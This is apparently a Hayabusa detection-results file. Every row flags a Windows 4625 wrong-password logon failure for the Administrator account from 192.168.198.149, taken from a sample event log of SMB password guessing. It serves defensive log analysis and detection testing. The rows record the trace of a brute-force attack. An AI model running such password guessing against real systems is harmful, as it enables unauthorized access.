2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
